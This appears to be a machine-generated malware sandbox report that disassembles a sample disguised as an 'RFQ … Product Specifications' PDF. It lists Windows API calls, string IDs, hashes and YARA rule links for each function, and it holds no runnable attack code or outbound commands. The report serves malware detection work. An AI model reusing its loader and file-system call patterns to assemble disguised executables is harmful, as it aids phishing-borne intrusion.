                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                • String ID: DllGetClassObject
                                                                                                                • API String ID: 753597075-1075368562
                                                                                                                • Opcode ID: cb5094d6884cc0b3dc22cb2582965edaeb30c555e913f712f84b983c0a772c79
                                                                                                                • Instruction ID: 16d1d85293fa75e2601d3ad2b357e889229af4eaa3ed7412cf7fb2b48f899d1a
                                                                                                                • Opcode Fuzzy Hash: cb5094d6884cc0b3dc22cb2582965edaeb30c555e913f712f84b983c0a772c79
                                                                                                                • Instruction Fuzzy Hash: 1B415E71604205AFDB15CF54CC84B9F7BB9EF45710F1480AABD069F28AD7B1DA49CBA0
                                                                                                                Function 00AD3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD3E35
                                                                                                                • IsMenu.USER32(?), ref: 00AD3E4A
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AD3E92
                                                                                                                • DrawMenuBar.USER32 ref: 00AD3EA5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3076010158-4108050209
                                                                                                                • Opcode ID: 6f08a628890020397079d49fd8bd137231f229844cc6250351c2387ddba294ea
                                                                                                                • Instruction ID: 66f9d9c4fe6cfb76041ff5ecb3ea5ebf33c204ca29b14676848a4605da75d36f
                                                                                                                • Opcode Fuzzy Hash: 6f08a628890020397079d49fd8bd137231f229844cc6250351c2387ddba294ea
                                                                                                                • Instruction Fuzzy Hash: E0412976A01209AFDF10DF54D884AEABBF9FF49364F04412AE91697390DB30AE45CF51
                                                                                                                Function 00AA1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00AA3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00AA3CCA
                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AA1E66
                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AA1E79
                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00AA1EA9
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$_wcslen$ClassName
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 2081771294-1403004172
                                                                                                                • Opcode ID: c1bb3fd4d128e6d9e2a8827a9913876a80e89e8ee2d03390753b3b4fb545f40d
                                                                                                                • Instruction ID: c86f62930127e71ac8c69bfa773d3bda165be54043b82f93566c6ac553981f66
                                                                                                                • Opcode Fuzzy Hash: c1bb3fd4d128e6d9e2a8827a9913876a80e89e8ee2d03390753b3b4fb545f40d
                                                                                                                • Instruction Fuzzy Hash: 03212975A00104BEDB24ABA4DD46CFFB7B9EF46360F10451AFC15A71E1DB38490AC620
                                                                                                                Function 00AD2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AD2F8D
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00AD2F94
                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AD2FA9
                                                                                                                • DestroyWindow.USER32(?), ref: 00AD2FB1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                • String ID: SysAnimate32
                                                                                                                • API String ID: 3529120543-1011021900
                                                                                                                • Opcode ID: f493cb80c1e200eaf8666d4457fa6469ee237156f9250812404ced908d6c0a88
                                                                                                                • Instruction ID: 272334be3a6ef54bc2089877c1ec1bfabaafb56e79107567e9ddbe4091f1e67e
                                                                                                                • Opcode Fuzzy Hash: f493cb80c1e200eaf8666d4457fa6469ee237156f9250812404ced908d6c0a88
                                                                                                                • Instruction Fuzzy Hash: 82219D71204205ABEB108FA4DC84FBB77B9EBAD364F104A1AF952D2290D771DC61D760
                                                                                                                Function 00A64D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A64D1E,00A728E9,?,00A64CBE,00A728E9,00B088B8,0000000C,00A64E15,00A728E9,00000002), ref: 00A64D8D
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A64DA0
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00A64D1E,00A728E9,?,00A64CBE,00A728E9,00B088B8,0000000C,00A64E15,00A728E9,00000002,00000000), ref: 00A64DC3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                • Opcode ID: b97f33604cf34131f97542b49bacef64f81ef6cc39ba62d64b14ac4d49ee4f73
                                                                                                                • Instruction ID: e47795f5a8d158fb5abc251644fdfcfa032c79c0b4afb0fa4b9811b9abc543ec
                                                                                                                • Opcode Fuzzy Hash: b97f33604cf34131f97542b49bacef64f81ef6cc39ba62d64b14ac4d49ee4f73
                                                                                                                • Instruction Fuzzy Hash: 1BF0AF30A01219FBDB109FD0DC09FAEBFB8EF48761F4002A5F806A2260CF745A81CA90
                                                                                                                Function 00A44E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A44EDD,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44E9C
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A44EAE
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00A44EDD,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44EC0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 145871493-3689287502
                                                                                                                • Opcode ID: 1485c4c216a9ca5015b253b4cb50025a01bf30a17e3139841a24b65c9d906bf6
                                                                                                                • Instruction ID: 6ca92fcf8f354ee431977fe3aa34eef51a60ac6bc9eda8b5f86a67b43b6c7326
                                                                                                                • Opcode Fuzzy Hash: 1485c4c216a9ca5015b253b4cb50025a01bf30a17e3139841a24b65c9d906bf6
                                                                                                                • Instruction Fuzzy Hash: F2E08639A065339BD22157656C1DB9B76A8AFC5F727450216FC02D2250DF64CD02C0A0
                                                                                                                Function 00A44E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A83CDE,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44E62
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A44E74
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00A83CDE,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44E87
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 145871493-1355242751
                                                                                                                • Opcode ID: b6718be2f1134afb91754c623c8e3b77a59a15ed09a076110686e7867631ada5
                                                                                                                • Instruction ID: b09ad359df80057ae67aced9356af1bb1c589ab6483ced95541593f81d872107
                                                                                                                • Opcode Fuzzy Hash: b6718be2f1134afb91754c623c8e3b77a59a15ed09a076110686e7867631ada5
                                                                                                                • Instruction Fuzzy Hash: EDD0EC3950263367DA225B656C19ECB7A68AF89F613450616F906A3165CF64CE02C590
                                                                                                                Function 00AB2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AB2C05
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00AB2C87
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AB2C9D
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AB2CAE
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AB2CC0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Delete$Copy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3226157194-0
                                                                                                                • Opcode ID: 11e6f10991b0c90f6ec5bf602404797f226fe970cfafe2aa9ee52be2a668e783
                                                                                                                • Instruction ID: f52a5c139f3480c926e5abf2e4b76163d6a2b1689d75fc18f5edd35fdb406a80
                                                                                                                • Opcode Fuzzy Hash: 11e6f10991b0c90f6ec5bf602404797f226fe970cfafe2aa9ee52be2a668e783
                                                                                                                • Instruction Fuzzy Hash: 8EB14E72D00119ABDF21EFA4CD85EDEBBBDEF49350F1040A6F609E7152EA319A448F61
                                                                                                                Function 00ACA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00ACA427
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00ACA435
                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00ACA468
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00ACA63D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3488606520-0
                                                                                                                • Opcode ID: 68def64c6fc6fdca4c93edced3d293d7181b28adc6abb249e568020fa5c7f046
                                                                                                                • Instruction ID: ade546d4f486ead9fdd6bb984175db9e974367a5921806ff293bd71a7554bd5e
                                                                                                                • Opcode Fuzzy Hash: 68def64c6fc6fdca4c93edced3d293d7181b28adc6abb249e568020fa5c7f046
                                                                                                                • Instruction Fuzzy Hash: 43A1CF756043019FD720DF24C986F2AB7E1AF84718F14881DF99A9B392DBB0EC45CB82
                                                                                                                Function 00A7BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00AE3700), ref: 00A7BB91
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00B1121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A7BC09
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00B11270,000000FF,?,0000003F,00000000,?), ref: 00A7BC36
                                                                                                                • _free.LIBCMT ref: 00A7BB7F
                                                                                                                  • Part of subcall function 00A729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000), ref: 00A729DE
                                                                                                                  • Part of subcall function 00A729C8: GetLastError.KERNEL32(00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000,00000000), ref: 00A729F0
                                                                                                                • _free.LIBCMT ref: 00A7BD4B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                • String ID:
                                                                                                                • API String ID: 1286116820-0
                                                                                                                • Opcode ID: 986a2cb4f6a4c606800dd0faca9c753fa6b892645c4ba44622364d5448865262
                                                                                                                • Instruction ID: 3d65cd402152bc85b4c44b7e013a17ce15bdca7a78c2c59fbe58cc6adccf1679
                                                                                                                • Opcode Fuzzy Hash: 986a2cb4f6a4c606800dd0faca9c753fa6b892645c4ba44622364d5448865262
                                                                                                                • Instruction Fuzzy Hash: 0051F9B1910209EFCB10EF699D41AEEB7BCEF44310F50C66AE558D71A1EB709E41CBA0
                                                                                                                Function 00AAE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AACF22,?), ref: 00AADDFD
                                                                                                                  • Part of subcall function 00AADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AACF22,?), ref: 00AADE16
                                                                                                                  • Part of subcall function 00AAE199: GetFileAttributesW.KERNEL32(?,00AACF95), ref: 00AAE19A
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00AAE473
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00AAE4AC
                                                                                                                • _wcslen.LIBCMT ref: 00AAE5EB
                                                                                                                • _wcslen.LIBCMT ref: 00AAE603
                                                                                                                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00AAE650
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 3183298772-0
                                                                                                                • Opcode ID: 924c59f374f65a674f202908eadc08a4ebfb601a76857da84a21efe8031fd035
                                                                                                                • Instruction ID: 838c264bc474a37e8b76ecd5537e21456cfe74893f5c01ec180cdbc806369a2d
                                                                                                                • Opcode Fuzzy Hash: 924c59f374f65a674f202908eadc08a4ebfb601a76857da84a21efe8031fd035
                                                                                                                • Instruction Fuzzy Hash: 3A51A4B24083459BC724EBA4DD819DFB3ECAF85340F00492EF689D3191EF75A688C766
                                                                                                                Function 00ACB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00ACC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ACB6AE,?,?), ref: 00ACC9B5
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACC9F1
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACCA68
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACCA9E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ACBAA5
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00ACBB00
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00ACBB63
                                                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00ACBBA6
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00ACBBB3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                • String ID:
                                                                                                                • API String ID: 826366716-0
                                                                                                                • Opcode ID: e9e621323af79fc58d22dc4b76593baf207e87ba8b9e7bf2747c1f05350ec47e
                                                                                                                • Instruction ID: 753afb034491b19435053b155a3e4402f322706a646d92330d893037d3f19f9e
                                                                                                                • Opcode Fuzzy Hash: e9e621323af79fc58d22dc4b76593baf207e87ba8b9e7bf2747c1f05350ec47e
                                                                                                                • Instruction Fuzzy Hash: FA61BF31218241AFC314DF14C491F2ABBE5FF84348F55895CF49A8B2A2CB32ED45CBA2
                                                                                                                Function 00AA8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AA8BCD
                                                                                                                • VariantClear.OLEAUT32 ref: 00AA8C3E
                                                                                                                • VariantClear.OLEAUT32 ref: 00AA8C9D
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AA8D10
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AA8D3B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
